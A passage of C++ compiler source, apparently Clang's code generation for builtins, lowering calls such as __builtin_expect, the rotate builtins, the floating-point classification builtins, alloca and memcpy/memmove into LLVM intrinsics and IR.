case Builtin::BI__builtin_popcountl:
case Builtin::BI__builtin_popcountll: {
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ctpop, ArgType);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Result = Builder.CreateCall(F, ArgValue);
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__builtin_unpredictable: {
// Always return the argument of __builtin_unpredictable. LLVM does not
// handle this builtin. Metadata for this builtin should be added directly
// to instructions such as branches or switches that use it.
return RValue::get(EmitScalarExpr(E->getArg(0)));
}
case Builtin::BI__builtin_expect: {
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Value *ExpectedValue = EmitScalarExpr(E->getArg(1));
// Don't generate llvm.expect on -O0 as the backend won't use it for
// anything.
// Note, we still IRGen ExpectedValue because it could have side-effects.
if (CGM.getCodeGenOpts().OptimizationLevel == 0)
return RValue::get(ArgValue);
Function *FnExpect = CGM.getIntrinsic(Intrinsic::expect, ArgType);
Value *Result =
Builder.CreateCall(FnExpect, {ArgValue, ExpectedValue}, "expval");
return RValue::get(Result);
}
case Builtin::BI__builtin_expect_with_probability: {
Value *ArgValue = EmitScalarExpr(E->getArg(0));
llvm::Type *ArgType = ArgValue->getType();
Value *ExpectedValue = EmitScalarExpr(E->getArg(1));
llvm::APFloat Probability(0.0);
const Expr *ProbArg = E->getArg(2);
bool EvalSucceed = ProbArg->EvaluateAsFloat(Probability, CGM.getContext());
assert(EvalSucceed && "probability should be able to evaluate as float");
(void)EvalSucceed;
bool LoseInfo = false;
Probability.convert(llvm::APFloat::IEEEdouble(),
llvm::RoundingMode::Dynamic, &LoseInfo);
llvm::Type *Ty = ConvertType(ProbArg->getType());
Constant *Confidence = ConstantFP::get(Ty, Probability);
// Don't generate llvm.expect.with.probability on -O0 as the backend
// won't use it for anything.
// Note, we still IRGen ExpectedValue because it could have side-effects.
if (CGM.getCodeGenOpts().OptimizationLevel == 0)
return RValue::get(ArgValue);
Function *FnExpect =
CGM.getIntrinsic(Intrinsic::expect_with_probability, ArgType);
Value *Result = Builder.CreateCall(
FnExpect, {ArgValue, ExpectedValue, Confidence}, "expval");
return RValue::get(Result);
}
case Builtin::BI__builtin_assume_aligned: {
const Expr *Ptr = E->getArg(0);
Value *PtrValue = EmitScalarExpr(Ptr);
Value *OffsetValue =
(E->getNumArgs() > 2) ? EmitScalarExpr(E->getArg(2)) : nullptr;
Value *AlignmentValue = EmitScalarExpr(E->getArg(1));
ConstantInt *AlignmentCI = cast<ConstantInt>(AlignmentValue);
if (AlignmentCI->getValue().ugt(llvm::Value::MaximumAlignment))
AlignmentCI = ConstantInt::get(AlignmentCI->getType(),
llvm::Value::MaximumAlignment);
emitAlignmentAssumption(PtrValue, Ptr,
/*The expr loc is sufficient.*/ SourceLocation(),
AlignmentCI, OffsetValue);
return RValue::get(PtrValue);
}
case Builtin::BI__assume:
case Builtin::BI__builtin_assume: {
if (E->getArg(0)->HasSideEffects(getContext()))
return RValue::get(nullptr);
Value *ArgValue = EmitScalarExpr(E->getArg(0));
Function *FnAssume = CGM.getIntrinsic(Intrinsic::assume);
return RValue::get(Builder.CreateCall(FnAssume, ArgValue));
}
case Builtin::BI__arithmetic_fence: {
// Create the builtin call if FastMath is selected, and the target
// supports the builtin, otherwise just return the argument.
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
llvm::FastMathFlags FMF = Builder.getFastMathFlags();
bool isArithmeticFenceEnabled =
FMF.allowReassoc() &&
getContext().getTargetInfo().checkArithmeticFenceSupported();
QualType ArgType = E->getArg(0)->getType();
if (ArgType->isComplexType()) {
if (isArithmeticFenceEnabled) {
QualType ElementType = ArgType->castAs<ComplexType>()->getElementType();
ComplexPairTy ComplexVal = EmitComplexExpr(E->getArg(0));
Value *Real = Builder.CreateArithmeticFence(ComplexVal.first,
ConvertType(ElementType));
Value *Imag = Builder.CreateArithmeticFence(ComplexVal.second,
ConvertType(ElementType));
return RValue::getComplex(std::make_pair(Real, Imag));
}
ComplexPairTy ComplexVal = EmitComplexExpr(E->getArg(0));
Value *Real = ComplexVal.first;
Value *Imag = ComplexVal.second;
return RValue::getComplex(std::make_pair(Real, Imag));
}
Value *ArgValue = EmitScalarExpr(E->getArg(0));
if (isArithmeticFenceEnabled)
return RValue::get(
Builder.CreateArithmeticFence(ArgValue, ConvertType(ArgType)));
return RValue::get(ArgValue);
}
case Builtin::BI__builtin_bswap16:
case Builtin::BI__builtin_bswap32:
case Builtin::BI__builtin_bswap64: {
return RValue::get(emitUnaryBuiltin(*this, E, Intrinsic::bswap));
}
case Builtin::BI__builtin_bitreverse8:
case Builtin::BI__builtin_bitreverse16:
case Builtin::BI__builtin_bitreverse32:
case Builtin::BI__builtin_bitreverse64: {
return RValue::get(emitUnaryBuiltin(*this, E, Intrinsic::bitreverse));
}
case Builtin::BI__builtin_rotateleft8:
case Builtin::BI__builtin_rotateleft16:
case Builtin::BI__builtin_rotateleft32:
case Builtin::BI__builtin_rotateleft64:
case Builtin::BI_rotl8: // Microsoft variants of rotate left
case Builtin::BI_rotl16:
case Builtin::BI_rotl:
case Builtin::BI_lrotl:
case Builtin::BI_rotl64:
return emitRotate(E, false);
case Builtin::BI__builtin_rotateright8:
case Builtin::BI__builtin_rotateright16:
case Builtin::BI__builtin_rotateright32:
case Builtin::BI__builtin_rotateright64:
case Builtin::BI_rotr8: // Microsoft variants of rotate right
case Builtin::BI_rotr16:
case Builtin::BI_rotr:
case Builtin::BI_lrotr:
case Builtin::BI_rotr64:
return emitRotate(E, true);
case Builtin::BI__builtin_constant_p: {
llvm::Type *ResultType = ConvertType(E->getType());
const Expr *Arg = E->getArg(0);
QualType ArgType = Arg->getType();
// FIXME: The allowance for Obj-C pointers and block pointers is historical
// and likely a mistake.
if (!ArgType->isIntegralOrEnumerationType() && !ArgType->isFloatingType() &&
!ArgType->isObjCObjectPointerType() && !ArgType->isBlockPointerType())
// Per the GCC documentation, only numeric constants are recognized after
// inlining.
return RValue::get(ConstantInt::get(ResultType, 0));
if (Arg->HasSideEffects(getContext()))
// The argument is unevaluated, so be conservative if it might have
// side-effects.
return RValue::get(ConstantInt::get(ResultType, 0));
Value *ArgValue = EmitScalarExpr(Arg);
if (ArgType->isObjCObjectPointerType()) {
// Convert Objective-C objects to id because we cannot distinguish between
// LLVM types for Obj-C classes as they are opaque.
ArgType = CGM.getContext().getObjCIdType();
ArgValue = Builder.CreateBitCast(ArgValue, ConvertType(ArgType));
}
Function *F =
CGM.getIntrinsic(Intrinsic::is_constant, ConvertType(ArgType));
Value *Result = Builder.CreateCall(F, ArgValue);
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/false);
return RValue::get(Result);
}
case Builtin::BI__builtin_dynamic_object_size:
case Builtin::BI__builtin_object_size: {
unsigned Type =
E->getArg(1)->EvaluateKnownConstInt(getContext()).getZExtValue();
auto *ResType = cast<llvm::IntegerType>(ConvertType(E->getType()));
// We pass this builtin onto the optimizer so that it can figure out the
// object size in more complex cases.
bool IsDynamic = BuiltinID == Builtin::BI__builtin_dynamic_object_size;
return RValue::get(emitBuiltinObjectSize(E->getArg(0), Type, ResType,
/*EmittedE=*/nullptr, IsDynamic));
}
case Builtin::BI__builtin_prefetch: {
Value *Locality, *RW, *Address = EmitScalarExpr(E->getArg(0));
// FIXME: Technically these constants should of type 'int', yes?
RW = (E->getNumArgs() > 1) ? EmitScalarExpr(E->getArg(1)) :
llvm::ConstantInt::get(Int32Ty, 0);
Locality = (E->getNumArgs() > 2) ? EmitScalarExpr(E->getArg(2)) :
llvm::ConstantInt::get(Int32Ty, 3);
Value *Data = llvm::ConstantInt::get(Int32Ty, 1);
Function *F = CGM.getIntrinsic(Intrinsic::prefetch, Address->getType());
return RValue::get(Builder.CreateCall(F, {Address, RW, Locality, Data}));
}
case Builtin::BI__builtin_readcyclecounter: {
Function *F = CGM.getIntrinsic(Intrinsic::readcyclecounter);
return RValue::get(Builder.CreateCall(F));
}
case Builtin::BI__builtin___clear_cache: {
Value *Begin = EmitScalarExpr(E->getArg(0));
Value *End = EmitScalarExpr(E->getArg(1));
Function *F = CGM.getIntrinsic(Intrinsic::clear_cache);
return RValue::get(Builder.CreateCall(F, {Begin, End}));
}
case Builtin::BI__builtin_trap:
return RValue::get(EmitTrapCall(Intrinsic::trap));
case Builtin::BI__debugbreak:
return RValue::get(EmitTrapCall(Intrinsic::debugtrap));
case Builtin::BI__builtin_unreachable: {
EmitUnreachable(E->getExprLoc());
// We do need to preserve an insertion point.
EmitBlock(createBasicBlock("unreachable.cont"));
return RValue::get(nullptr);
}
case Builtin::BI__builtin_powi:
case Builtin::BI__builtin_powif:
case Builtin::BI__builtin_powil: {
llvm::Value *Src0 = EmitScalarExpr(E->getArg(0));
llvm::Value *Src1 = EmitScalarExpr(E->getArg(1));
if (Builder.getIsFPConstrained()) {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
Function *F = CGM.getIntrinsic(Intrinsic::experimental_constrained_powi,
Src0->getType());
return RValue::get(Builder.CreateConstrainedFPCall(F, { Src0, Src1 }));
}
Function *F = CGM.getIntrinsic(Intrinsic::powi,
{ Src0->getType(), Src1->getType() });
return RValue::get(Builder.CreateCall(F, { Src0, Src1 }));
}
case Builtin::BI__builtin_isgreater:
case Builtin::BI__builtin_isgreaterequal:
case Builtin::BI__builtin_isless:
case Builtin::BI__builtin_islessequal:
case Builtin::BI__builtin_islessgreater:
case Builtin::BI__builtin_isunordered: {
// Ordered comparisons: we know the arguments to these are matching scalar
// floating point values.
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
// FIXME: for strictfp/IEEE-754 we need to not trap on SNaN here.
Value *LHS = EmitScalarExpr(E->getArg(0));
Value *RHS = EmitScalarExpr(E->getArg(1));
switch (BuiltinID) {
default: llvm_unreachable("Unknown ordered comparison");
case Builtin::BI__builtin_isgreater:
LHS = Builder.CreateFCmpOGT(LHS, RHS, "cmp");
break;
case Builtin::BI__builtin_isgreaterequal:
LHS = Builder.CreateFCmpOGE(LHS, RHS, "cmp");
break;
case Builtin::BI__builtin_isless:
LHS = Builder.CreateFCmpOLT(LHS, RHS, "cmp");
break;
case Builtin::BI__builtin_islessequal:
LHS = Builder.CreateFCmpOLE(LHS, RHS, "cmp");
break;
case Builtin::BI__builtin_islessgreater:
LHS = Builder.CreateFCmpONE(LHS, RHS, "cmp");
break;
case Builtin::BI__builtin_isunordered:
LHS = Builder.CreateFCmpUNO(LHS, RHS, "cmp");
break;
}
// ZExt bool to int type.
return RValue::get(Builder.CreateZExt(LHS, ConvertType(E->getType())));
}
case Builtin::BI__builtin_isnan: {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
Value *V = EmitScalarExpr(E->getArg(0));
llvm::Type *Ty = V->getType();
const llvm::fltSemantics &Semantics = Ty->getFltSemantics();
if (!Builder.getIsFPConstrained() ||
Builder.getDefaultConstrainedExcept() == fp::ebIgnore ||
!Ty->isIEEE()) {
V = Builder.CreateFCmpUNO(V, V, "cmp");
return RValue::get(Builder.CreateZExt(V, ConvertType(E->getType())));
}
if (Value *Result = getTargetHooks().testFPKind(V, BuiltinID, Builder, CGM))
return RValue::get(Result);
// NaN has all exp bits set and a non zero significand. Therefore:
// isnan(V) == ((exp mask - (abs(V) & exp mask)) < 0)
unsigned bitsize = Ty->getScalarSizeInBits();
llvm::IntegerType *IntTy = Builder.getIntNTy(bitsize);
Value *IntV = Builder.CreateBitCast(V, IntTy);
APInt AndMask = APInt::getSignedMaxValue(bitsize);
Value *AbsV =
Builder.CreateAnd(IntV, llvm::ConstantInt::get(IntTy, AndMask));
APInt ExpMask = APFloat::getInf(Semantics).bitcastToAPInt();
Value *Sub =
Builder.CreateSub(llvm::ConstantInt::get(IntTy, ExpMask), AbsV);
// V = sign bit (Sub) <=> V = (Sub < 0)
V = Builder.CreateLShr(Sub, llvm::ConstantInt::get(IntTy, bitsize - 1));
if (bitsize > 32)
V = Builder.CreateTrunc(V, ConvertType(E->getType()));
return RValue::get(V);
}
case Builtin::BI__builtin_elementwise_abs: {
Value *Op0 = EmitScalarExpr(E->getArg(0));
Value *Result;
if (Op0->getType()->isIntOrIntVectorTy())
Result = Builder.CreateBinaryIntrinsic(
llvm::Intrinsic::abs, Op0, Builder.getFalse(), nullptr, "elt.abs");
else
Result = Builder.CreateUnaryIntrinsic(llvm::Intrinsic::fabs, Op0, nullptr,
"elt.abs");
return RValue::get(Result);
}
case Builtin::BI__builtin_elementwise_max: {
Value *Op0 = EmitScalarExpr(E->getArg(0));
Value *Op1 = EmitScalarExpr(E->getArg(1));
Value *Result;
if (Op0->getType()->isIntOrIntVectorTy()) {
QualType Ty = E->getArg(0)->getType();
if (auto *VecTy = Ty->getAs<VectorType>())
Ty = VecTy->getElementType();
Result = Builder.CreateBinaryIntrinsic(Ty->isSignedIntegerType()
? llvm::Intrinsic::smax
: llvm::Intrinsic::umax,
Op0, Op1, nullptr, "elt.max");
} else
Result = Builder.CreateMaxNum(Op0, Op1, "elt.max");
return RValue::get(Result);
}
case Builtin::BI__builtin_elementwise_min: {
Value *Op0 = EmitScalarExpr(E->getArg(0));
Value *Op1 = EmitScalarExpr(E->getArg(1));
Value *Result;
if (Op0->getType()->isIntOrIntVectorTy()) {
QualType Ty = E->getArg(0)->getType();
if (auto *VecTy = Ty->getAs<VectorType>())
Ty = VecTy->getElementType();
Result = Builder.CreateBinaryIntrinsic(Ty->isSignedIntegerType()
? llvm::Intrinsic::smin
: llvm::Intrinsic::umin,
Op0, Op1, nullptr, "elt.min");
} else
Result = Builder.CreateMinNum(Op0, Op1, "elt.min");
return RValue::get(Result);
}
case Builtin::BI__builtin_reduce_max: {
auto GetIntrinsicID = [](QualType QT, llvm::Type *IrTy) {
if (IrTy->isIntOrIntVectorTy()) {
if (auto *VecTy = QT->getAs<VectorType>())
QT = VecTy->getElementType();
if (QT->isSignedIntegerType())
return llvm::Intrinsic::vector_reduce_smax;
else
return llvm::Intrinsic::vector_reduce_umax;
}
return llvm::Intrinsic::vector_reduce_fmax;
};
Value *Op0 = EmitScalarExpr(E->getArg(0));
Value *Result = Builder.CreateUnaryIntrinsic(
GetIntrinsicID(E->getArg(0)->getType(), Op0->getType()), Op0, nullptr,
"rdx.min");
return RValue::get(Result);
}
case Builtin::BI__builtin_reduce_min: {
auto GetIntrinsicID = [](QualType QT, llvm::Type *IrTy) {
if (IrTy->isIntOrIntVectorTy()) {
if (auto *VecTy = QT->getAs<VectorType>())
QT = VecTy->getElementType();
if (QT->isSignedIntegerType())
return llvm::Intrinsic::vector_reduce_smin;
else
return llvm::Intrinsic::vector_reduce_umin;
}
return llvm::Intrinsic::vector_reduce_fmin;
};
Value *Op0 = EmitScalarExpr(E->getArg(0));
Value *Result = Builder.CreateUnaryIntrinsic(
GetIntrinsicID(E->getArg(0)->getType(), Op0->getType()), Op0, nullptr,
"rdx.min");
return RValue::get(Result);
}
case Builtin::BI__builtin_matrix_transpose: {
const auto *MatrixTy = E->getArg(0)->getType()->getAs<ConstantMatrixType>();
Value *MatValue = EmitScalarExpr(E->getArg(0));
MatrixBuilder<CGBuilderTy> MB(Builder);
Value *Result = MB.CreateMatrixTranspose(MatValue, MatrixTy->getNumRows(),
MatrixTy->getNumColumns());
return RValue::get(Result);
}
case Builtin::BI__builtin_matrix_column_major_load: {
MatrixBuilder<CGBuilderTy> MB(Builder);
// Emit everything that isn't dependent on the first parameter type
Value *Stride = EmitScalarExpr(E->getArg(3));
const auto *ResultTy = E->getType()->getAs<ConstantMatrixType>();
auto *PtrTy = E->getArg(0)->getType()->getAs<PointerType>();
assert(PtrTy && "arg0 must be of pointer type");
bool IsVolatile = PtrTy->getPointeeType().isVolatileQualified();
Address Src = EmitPointerWithAlignment(E->getArg(0));
EmitNonNullArgCheck(RValue::get(Src.getPointer()), E->getArg(0)->getType(),
E->getArg(0)->getExprLoc(), FD, 0);
Value *Result = MB.CreateColumnMajorLoad(
Src.getPointer(), Align(Src.getAlignment().getQuantity()), Stride,
IsVolatile, ResultTy->getNumRows(), ResultTy->getNumColumns(),
"matrix");
return RValue::get(Result);
}
case Builtin::BI__builtin_matrix_column_major_store: {
MatrixBuilder<CGBuilderTy> MB(Builder);
Value *Matrix = EmitScalarExpr(E->getArg(0));
Address Dst = EmitPointerWithAlignment(E->getArg(1));
Value *Stride = EmitScalarExpr(E->getArg(2));
const auto *MatrixTy = E->getArg(0)->getType()->getAs<ConstantMatrixType>();
auto *PtrTy = E->getArg(1)->getType()->getAs<PointerType>();
assert(PtrTy && "arg1 must be of pointer type");
bool IsVolatile = PtrTy->getPointeeType().isVolatileQualified();
EmitNonNullArgCheck(RValue::get(Dst.getPointer()), E->getArg(1)->getType(),
E->getArg(1)->getExprLoc(), FD, 0);
Value *Result = MB.CreateColumnMajorStore(
Matrix, Dst.getPointer(), Align(Dst.getAlignment().getQuantity()),
Stride, IsVolatile, MatrixTy->getNumRows(), MatrixTy->getNumColumns());
return RValue::get(Result);
}
case Builtin::BIfinite:
case Builtin::BI__finite:
case Builtin::BIfinitef:
case Builtin::BI__finitef:
case Builtin::BIfinitel:
case Builtin::BI__finitel:
case Builtin::BI__builtin_isinf:
case Builtin::BI__builtin_isfinite: {
// isinf(x) --> fabs(x) == infinity
// isfinite(x) --> fabs(x) != infinity
// x != NaN via the ordered compare in either case.
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
Value *V = EmitScalarExpr(E->getArg(0));
llvm::Type *Ty = V->getType();
if (!Builder.getIsFPConstrained() ||
Builder.getDefaultConstrainedExcept() == fp::ebIgnore ||
!Ty->isIEEE()) {
Value *Fabs = EmitFAbs(*this, V);
Constant *Infinity = ConstantFP::getInfinity(V->getType());
CmpInst::Predicate Pred = (BuiltinID == Builtin::BI__builtin_isinf)
? CmpInst::FCMP_OEQ
: CmpInst::FCMP_ONE;
Value *FCmp = Builder.CreateFCmp(Pred, Fabs, Infinity, "cmpinf");
return RValue::get(Builder.CreateZExt(FCmp, ConvertType(E->getType())));
}
if (Value *Result = getTargetHooks().testFPKind(V, BuiltinID, Builder, CGM))
return RValue::get(Result);
// Inf values have all exp bits set and a zero significand. Therefore:
// isinf(V) == ((V << 1) == ((exp mask) << 1))
// isfinite(V) == ((V << 1) < ((exp mask) << 1)) using unsigned comparison
unsigned bitsize = Ty->getScalarSizeInBits();
llvm::IntegerType *IntTy = Builder.getIntNTy(bitsize);
Value *IntV = Builder.CreateBitCast(V, IntTy);
Value *Shl1 = Builder.CreateShl(IntV, 1);
const llvm::fltSemantics &Semantics = Ty->getFltSemantics();
APInt ExpMask = APFloat::getInf(Semantics).bitcastToAPInt();
Value *ExpMaskShl1 = llvm::ConstantInt::get(IntTy, ExpMask.shl(1));
if (BuiltinID == Builtin::BI__builtin_isinf)
V = Builder.CreateICmpEQ(Shl1, ExpMaskShl1);
else
V = Builder.CreateICmpULT(Shl1, ExpMaskShl1);
return RValue::get(Builder.CreateZExt(V, ConvertType(E->getType())));
}
case Builtin::BI__builtin_isinf_sign: {
// isinf_sign(x) -> fabs(x) == infinity ? (signbit(x) ? -1 : 1) : 0
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
// FIXME: for strictfp/IEEE-754 we need to not trap on SNaN here.
Value *Arg = EmitScalarExpr(E->getArg(0));
Value *AbsArg = EmitFAbs(*this, Arg);
Value *IsInf = Builder.CreateFCmpOEQ(
AbsArg, ConstantFP::getInfinity(Arg->getType()), "isinf");
Value *IsNeg = EmitSignBit(*this, Arg);
llvm::Type *IntTy = ConvertType(E->getType());
Value *Zero = Constant::getNullValue(IntTy);
Value *One = ConstantInt::get(IntTy, 1);
Value *NegativeOne = ConstantInt::get(IntTy, -1);
Value *SignResult = Builder.CreateSelect(IsNeg, NegativeOne, One);
Value *Result = Builder.CreateSelect(IsInf, SignResult, Zero);
return RValue::get(Result);
}
case Builtin::BI__builtin_isnormal: {
// isnormal(x) --> x == x && fabsf(x) < infinity && fabsf(x) >= float_min
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
// FIXME: for strictfp/IEEE-754 we need to not trap on SNaN here.
Value *V = EmitScalarExpr(E->getArg(0));
Value *Eq = Builder.CreateFCmpOEQ(V, V, "iseq");
Value *Abs = EmitFAbs(*this, V);
Value *IsLessThanInf =
Builder.CreateFCmpULT(Abs, ConstantFP::getInfinity(V->getType()),"isinf");
APFloat Smallest = APFloat::getSmallestNormalized(
getContext().getFloatTypeSemantics(E->getArg(0)->getType()));
Value *IsNormal =
Builder.CreateFCmpUGE(Abs, ConstantFP::get(V->getContext(), Smallest),
"isnormal");
V = Builder.CreateAnd(Eq, IsLessThanInf, "and");
V = Builder.CreateAnd(V, IsNormal, "and");
return RValue::get(Builder.CreateZExt(V, ConvertType(E->getType())));
}
case Builtin::BI__builtin_flt_rounds: {
Function *F = CGM.getIntrinsic(Intrinsic::flt_rounds);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Result = Builder.CreateCall(F);
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return RValue::get(Result);
}
case Builtin::BI__builtin_fpclassify: {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
// FIXME: for strictfp/IEEE-754 we need to not trap on SNaN here.
Value *V = EmitScalarExpr(E->getArg(5));
llvm::Type *Ty = ConvertType(E->getArg(5)->getType());
// Create Result
BasicBlock *Begin = Builder.GetInsertBlock();
BasicBlock *End = createBasicBlock("fpclassify_end", this->CurFn);
Builder.SetInsertPoint(End);
PHINode *Result =
Builder.CreatePHI(ConvertType(E->getArg(0)->getType()), 4,
"fpclassify_result");
// if (V==0) return FP_ZERO
Builder.SetInsertPoint(Begin);
Value *IsZero = Builder.CreateFCmpOEQ(V, Constant::getNullValue(Ty),
"iszero");
Value *ZeroLiteral = EmitScalarExpr(E->getArg(4));
BasicBlock *NotZero = createBasicBlock("fpclassify_not_zero", this->CurFn);
Builder.CreateCondBr(IsZero, End, NotZero);
Result->addIncoming(ZeroLiteral, Begin);
// if (V != V) return FP_NAN
Builder.SetInsertPoint(NotZero);
Value *IsNan = Builder.CreateFCmpUNO(V, V, "cmp");
Value *NanLiteral = EmitScalarExpr(E->getArg(0));
BasicBlock *NotNan = createBasicBlock("fpclassify_not_nan", this->CurFn);
Builder.CreateCondBr(IsNan, End, NotNan);
Result->addIncoming(NanLiteral, NotZero);
// if (fabs(V) == infinity) return FP_INFINITY
Builder.SetInsertPoint(NotNan);
Value *VAbs = EmitFAbs(*this, V);
Value *IsInf =
Builder.CreateFCmpOEQ(VAbs, ConstantFP::getInfinity(V->getType()),
"isinf");
Value *InfLiteral = EmitScalarExpr(E->getArg(1));
BasicBlock *NotInf = createBasicBlock("fpclassify_not_inf", this->CurFn);
Builder.CreateCondBr(IsInf, End, NotInf);
Result->addIncoming(InfLiteral, NotNan);
// if (fabs(V) >= MIN_NORMAL) return FP_NORMAL else FP_SUBNORMAL
Builder.SetInsertPoint(NotInf);
APFloat Smallest = APFloat::getSmallestNormalized(
getContext().getFloatTypeSemantics(E->getArg(5)->getType()));
Value *IsNormal =
Builder.CreateFCmpUGE(VAbs, ConstantFP::get(V->getContext(), Smallest),
"isnormal");
Value *NormalResult =
Builder.CreateSelect(IsNormal, EmitScalarExpr(E->getArg(2)),
EmitScalarExpr(E->getArg(3)));
Builder.CreateBr(End);
Result->addIncoming(NormalResult, NotInf);
// return Result
Builder.SetInsertPoint(End);
return RValue::get(Result);
}
case Builtin::BIalloca:
case Builtin::BI_alloca:
case Builtin::BI__builtin_alloca: {
Value *Size = EmitScalarExpr(E->getArg(0));
const TargetInfo &TI = getContext().getTargetInfo();
// The alignment of the alloca should correspond to __BIGGEST_ALIGNMENT__.
const Align SuitableAlignmentInBytes =
CGM.getContext()
.toCharUnitsFromBits(TI.getSuitableAlign())
.getAsAlign();
AllocaInst *AI = Builder.CreateAlloca(Builder.getInt8Ty(), Size);
AI->setAlignment(SuitableAlignmentInBytes);
initializeAlloca(*this, AI, Size, SuitableAlignmentInBytes);
return RValue::get(AI);
}
case Builtin::BI__builtin_alloca_with_align: {
Value *Size = EmitScalarExpr(E->getArg(0));
Value *AlignmentInBitsValue = EmitScalarExpr(E->getArg(1));
auto *AlignmentInBitsCI = cast<ConstantInt>(AlignmentInBitsValue);
unsigned AlignmentInBits = AlignmentInBitsCI->getZExtValue();
const Align AlignmentInBytes =
CGM.getContext().toCharUnitsFromBits(AlignmentInBits).getAsAlign();
AllocaInst *AI = Builder.CreateAlloca(Builder.getInt8Ty(), Size);
AI->setAlignment(AlignmentInBytes);
initializeAlloca(*this, AI, Size, AlignmentInBytes);
return RValue::get(AI);
}
case Builtin::BIbzero:
case Builtin::BI__builtin_bzero: {
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Value *SizeVal = EmitScalarExpr(E->getArg(1));
EmitNonNullArgCheck(RValue::get(Dest.getPointer()), E->getArg(0)->getType(),
E->getArg(0)->getExprLoc(), FD, 0);
Builder.CreateMemSet(Dest, Builder.getInt8(0), SizeVal, false);
return RValue::get(nullptr);
}
case Builtin::BImemcpy:
case Builtin::BI__builtin_memcpy:
case Builtin::BImempcpy:
case Builtin::BI__builtin_mempcpy: {
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Address Src = EmitPointerWithAlignment(E->getArg(1));
Value *SizeVal = EmitScalarExpr(E->getArg(2));
EmitNonNullArgCheck(RValue::get(Dest.getPointer()), E->getArg(0)->getType(),
E->getArg(0)->getExprLoc(), FD, 0);
EmitNonNullArgCheck(RValue::get(Src.getPointer()), E->getArg(1)->getType(),
E->getArg(1)->getExprLoc(), FD, 1);
Builder.CreateMemCpy(Dest, Src, SizeVal, false);
if (BuiltinID == Builtin::BImempcpy ||
BuiltinID == Builtin::BI__builtin_mempcpy)
return RValue::get(Builder.CreateInBoundsGEP(Dest.getElementType(),
Dest.getPointer(), SizeVal));
else
return RValue::get(Dest.getPointer());
}
case Builtin::BI__builtin_memcpy_inline: {
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Address Src = EmitPointerWithAlignment(E->getArg(1));
uint64_t Size =
E->getArg(2)->EvaluateKnownConstInt(getContext()).getZExtValue();
EmitNonNullArgCheck(RValue::get(Dest.getPointer()), E->getArg(0)->getType(),
E->getArg(0)->getExprLoc(), FD, 0);
EmitNonNullArgCheck(RValue::get(Src.getPointer()), E->getArg(1)->getType(),
E->getArg(1)->getExprLoc(), FD, 1);
Builder.CreateMemCpyInline(Dest, Src, Size);
return RValue::get(nullptr);
}
case Builtin::BI__builtin_char_memchr:
BuiltinID = Builtin::BI__builtin_memchr;
break;
case Builtin::BI__builtin___memcpy_chk: {
// fold __builtin_memcpy_chk(x, y, cst1, cst2) to memcpy iff cst1<=cst2.
Expr::EvalResult SizeResult, DstSizeResult;
if (!E->getArg(2)->EvaluateAsInt(SizeResult, CGM.getContext()) ||
!E->getArg(3)->EvaluateAsInt(DstSizeResult, CGM.getContext()))
break;
llvm::APSInt Size = SizeResult.Val.getInt();
llvm::APSInt DstSize = DstSizeResult.Val.getInt();
if (Size.ugt(DstSize))
break;
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Address Src = EmitPointerWithAlignment(E->getArg(1));
Value *SizeVal = llvm::ConstantInt::get(Builder.getContext(), Size);
Builder.CreateMemCpy(Dest, Src, SizeVal, false);
return RValue::get(Dest.getPointer());
}
case Builtin::BI__builtin_objc_memmove_collectable: {
Address DestAddr = EmitPointerWithAlignment(E->getArg(0));
Address SrcAddr = EmitPointerWithAlignment(E->getArg(1));
Value *SizeVal = EmitScalarExpr(E->getArg(2));
CGM.getObjCRuntime().EmitGCMemmoveCollectable(*this,
DestAddr, SrcAddr, SizeVal);
return RValue::get(DestAddr.getPointer());
}
case Builtin::BI__builtin___memmove_chk: {
// fold __builtin_memmove_chk(x, y, cst1, cst2) to memmove iff cst1<=cst2.
Expr::EvalResult SizeResult, DstSizeResult;
if (!E->getArg(2)->EvaluateAsInt(SizeResult, CGM.getContext()) ||
!E->getArg(3)->EvaluateAsInt(DstSizeResult, CGM.getContext()))
break;
llvm::APSInt Size = SizeResult.Val.getInt();
llvm::APSInt DstSize = DstSizeResult.Val.getInt();
if (Size.ugt(DstSize))
break;
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Address Src = EmitPointerWithAlignment(E->getArg(1));
Value *SizeVal = llvm::ConstantInt::get(Builder.getContext(), Size);
Builder.CreateMemMove(Dest, Src, SizeVal, false);
return RValue::get(Dest.getPointer());
}
case Builtin::BImemmove:
case Builtin::BI__builtin_memmove: {
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Address Src = EmitPointerWithAlignment(E->getArg(1));
Value *SizeVal = EmitScalarExpr(E->getArg(2));
EmitNonNullArgCheck(RValue::get(Dest.getPointer()), E->getArg(0)->getType(),
E->getArg(0)->getExprLoc(), FD, 0);
EmitNonNullArgCheck(RValue::get(Src.getPointer()), E->getArg(1)->getType(),
E->getArg(1)->getExprLoc(), FD, 1);
Builder.CreateMemMove(Dest, Src, SizeVal, false);
return RValue::get(Dest.getPointer());
}
case Builtin::BImemset:
case Builtin::BI__builtin_memset: {
Address Dest = EmitPointerWithAlignment(E->getArg(0));
Value *ByteVal = Builder.CreateTrunc(EmitScalarExpr(E->getArg(1)),
Builder.getInt8Ty());
Value *SizeVal = EmitScalarExpr(E->getArg(2));
